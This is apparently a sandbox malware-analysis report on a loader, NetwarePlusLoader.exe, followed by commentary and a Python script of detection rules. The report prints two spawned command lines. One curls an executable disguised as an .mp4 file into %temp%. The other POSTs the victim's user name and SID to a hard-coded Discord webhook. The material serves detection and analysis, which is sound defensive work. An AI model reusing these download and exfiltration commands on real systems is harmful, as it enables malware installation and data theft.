Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 121s
max time network: 147s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 14/07/2024, 10:51
Static task
static1
Behavioral task
behavioral1
Sample
NetwarePlusLoader.exe
Resource
win7-20240705-en
General
Target: NetwarePlusLoader.exe
Size: 190KB
MD5: 3aee5f71b6ba6b81fa54ff3d5bfd30e0
SHA1: 5e0c48c23895cf097fcce62cc9d73db55d6fb605
SHA256: 05df9a3930acdd99f5d5f5420e33a3f0cb35c50da8d2b7f36b52c6f56230e307
SHA512: a6c97e8905002ae7e4dba759f2b871fff87a9d730576963914e3336ebc4c402c711e03c5bc086f1e2027fc9bf9fe9913cf30935e4048579f223296041ab340af
SSDEEP: 3072:lv69ZK/pWcANFVJ9pVe7DRIClM8H3c8yR7k6tX00bgUql:lv69ZK/pWcANFVJ9pVe7DRXlds8g7Ptz
Malware Config
Signatures

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | process
Token: SeDebugPrivilege | 2356 | NetwarePlusLoader.exe

Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | process | procid_target
PID 2356 wrote to memory of 3056 | 2356 | NetwarePlusLoader.exe | 33 (recorded 4 times)
PID 2356 wrote to memory of 2704 | 2356 | NetwarePlusLoader.exe | 35 (recorded 4 times)

Both write targets (3056 and 2704) are the cmd.exe children the loader itself spawns, and a parent writing into a process it has just created is normal CreateProcess behaviour. The report shows no writes into a process the loader did not start, so this signature on its own is not evidence of injection into a foreign process; the SeDebugPrivilege enablement is the more notable item, since the loader has no legitimate reason to hold it.
Processes

C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe (PID 2356)
  command line: "C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"
  signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

  child: C:\Windows\SysWOW64\cmd.exe (PID 3056)
    command line: "cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Dropper.mp4?v=1720953874596 --output %temp%\childlover.exe

  child: C:\Windows\SysWOW64\cmd.exe (PID 2704)
    command line: "cmd.exe" /c curl "https://discord.com/api/webhooks/1253698648257331411/L0Gb25A61e5G82Iq8Fne61WHla2fpQ9qB4rmcg6N7SlZixH4Kdr3tU27ilVxLwzmFpZT" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone\nSomeone Injected!\nAdmin | S-1-5-21-1385883288-3042840365-2734249351-1000"",""embeds"":null,""avatar_url"":""https://cdn.discordapp.com/avatars/1191678925055737867/9af2e220817c7d8265ce700fba05e989.webp?size=1024&format=webp&width=0&height=256"",""attachments"":[]}"

What the two child commands do: the first fetches a URL whose path ends in .mp4 and writes the body to %temp%\childlover.exe, so the media-looking name disguises an executable download. The second POSTs a JSON message to a Discord webhook announcing "@everyone\nSomeone Injected!" together with the victim's user name and SID (here Admin | S-1-5-21-1385883288-3042840365-2734249351-1000), using headers that mimic a Firefox request made through discohook.org. The loader delegates both network actions to curl via cmd.exe rather than making the requests itself, and the webhook URL and its token are hard-coded in the command line.
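The behaviour in this process tree is easy to match on process-creation telemetry. The following is an added example, not code from the tria.ge report or from the sample: three detection rules run over constructed process-creation records that mirror the tree above. The record layout (a simplified Sysmon Event ID 1 shape with pid, ppid, image and cmdline) is an assumption; PIDs, images and the two curl command lines are taken from the report, the webhook token is replaced with the placeholder TOKEN, and the loader's own parent PID (1100) and the final benign control event are made up.

```python
"""Detection logic for the pattern in this report: a loader in the user Temp
directory spawning cmd.exe to (1) curl a payload disguised as a media file into
%temp% as an .exe and (2) POST a beacon to a Discord webhook.

Added example; not the report's or the sample's code. Event layout is an
assumed, simplified Sysmon Event ID 1 shape.
"""
import re

# Constructed process-creation records. PIDs, images and the curl command lines
# come from the report; the webhook token is replaced with TOKEN, the loader's
# parent PID (1100) and the last (benign) record are made up.
SAMPLE_EVENTS = [
    {"pid": 2356, "ppid": 1100,
     "image": r"C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"'},
    {"pid": 3056, "ppid": 2356,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Dropper.mp4?v=1720953874596 --output %temp%\childlover.exe'},
    {"pid": 2704, "ppid": 2356,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /c curl "https://discord.com/api/webhooks/1253698648257331411/TOKEN" -X POST -H "Content-Type: application/json" --data-raw "{""content"":""@everyone\nSomeone Injected!""}"'},
    # Benign control: a shell started by an unrelated process saving a page as .html.
    {"pid": 4100, "ppid": 900,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"cmd.exe" /c curl https://example.com/index.html --output %temp%\page.html'},
]

URL_RE = re.compile(r"""https?://[^\s"']+""")
# curl output-file switches; kept case-sensitive so -O (remote-name) is not matched.
CURL_OUTPUT_RE = re.compile(r"""(?:--output|-o)\s+"?([^\s"]+)""")
WEBHOOK_RE = re.compile(r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/", re.I)
POST_RE = re.compile(r"(?:-X\s+POST|--data(?:-raw|-binary|-urlencode)?\s|-d\s)")
TEMP_RE = re.compile(r"(?:%temp%|%tmp%|\\appdata\\local\\temp\\)", re.I)

EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".msi"}
DECOY_EXTS = {".mp4", ".mp3", ".wav", ".jpg", ".jpeg", ".png", ".gif", ".webp", ".pdf", ".txt"}


def _ext(name):
    m = re.search(r"\.([A-Za-z0-9]{1,5})$", name)
    return "." + m.group(1).lower() if m else ""


def url_ext(url):
    """Extension of the URL's last path segment, ignoring query string and fragment."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    return _ext(path.rsplit("/", 1)[-1])


def file_ext(path):
    """Extension of a Windows or POSIX file path (handles %temp%\\name.exe)."""
    return _ext(re.split(r"[\\/]", path)[-1])


def detect_curl_executable_to_temp(ev):
    """curl writing an executable into a Temp location. Severity is high when the
    URL pretends to be a media/document file (Dropper.mp4 -> childlover.exe)."""
    cmd = ev["cmdline"]
    if "curl" not in cmd.lower():
        return None
    out = CURL_OUTPUT_RE.search(cmd)
    urls = URL_RE.findall(cmd)
    if not out or not urls:
        return None
    dest = out.group(1)
    if file_ext(dest) not in EXECUTABLE_EXTS or not TEMP_RE.search(dest):
        return None
    return {"pid": ev["pid"], "rule": "curl_download_executable_to_temp",
            "severity": "high" if url_ext(urls[0]) in DECOY_EXTS else "medium",
            "detail": f"{urls[0]} -> {dest}"}


def detect_discord_webhook(ev):
    """Command line carrying a Discord webhook URL; a POST to it is the beacon."""
    cmd = ev["cmdline"]
    m = WEBHOOK_RE.search(cmd)
    if not m:
        return None
    return {"pid": ev["pid"], "rule": "discord_webhook_post",
            "severity": "high" if POST_RE.search(cmd) else "medium",
            "detail": m.group(0)}


def detect_shell_from_temp(ev, by_pid):
    """cmd.exe whose parent image lives in a Temp directory (the loader)."""
    parent = by_pid.get(ev["ppid"])
    if not parent or not ev["image"].lower().endswith("\\cmd.exe"):
        return None
    if not TEMP_RE.search(parent["image"]):
        return None
    return {"pid": ev["pid"], "rule": "shell_spawned_from_temp", "severity": "medium",
            "detail": f"parent {parent['pid']} {parent['image']}"}


def scan(events):
    """Run every rule over a list of process-creation events and return the findings."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        for f in (detect_curl_executable_to_temp(ev), detect_discord_webhook(ev),
                  detect_shell_from_temp(ev, by_pid)):
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid {f['pid']} {f['rule']}: {f['detail']}")
```

On the constructed records the loader's two children each produce two findings (the Temp-parent rule plus the download or webhook rule) and the benign control produces none. The download rule keys on the mismatch between what the URL claims to be and what is written to disk, which survives a change of hosting domain; the webhook rule is host-based and should be paired with egress filtering for discord.com/api/webhooks where that is acceptable.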
Network
MITRE ATT&CK Matrix
Downloads

Filesize: 5B
MD5: 495063beeac89309a2247ce9c13ed292
SHA1: 063ee00ca80d81e068dd404b59ceb2a03b2e7109
SHA256: b4116d6e880009dc1440ddab7ec054bcea529aea394ec5bab7943b415a359281
SHA512: cac6de984822cd7cf97611897611873cb5951b9a63f75a46a54aa6c0d2f3565419a1aa574c657df94a7057d85b99515753615b7336d96a7ff9463a0f3dbf3ffa

A 5-byte body cannot be a PE file, so this download is not a working copy of childlover.exe; the report does not say which of the two requests it belongs to or what the bytes were.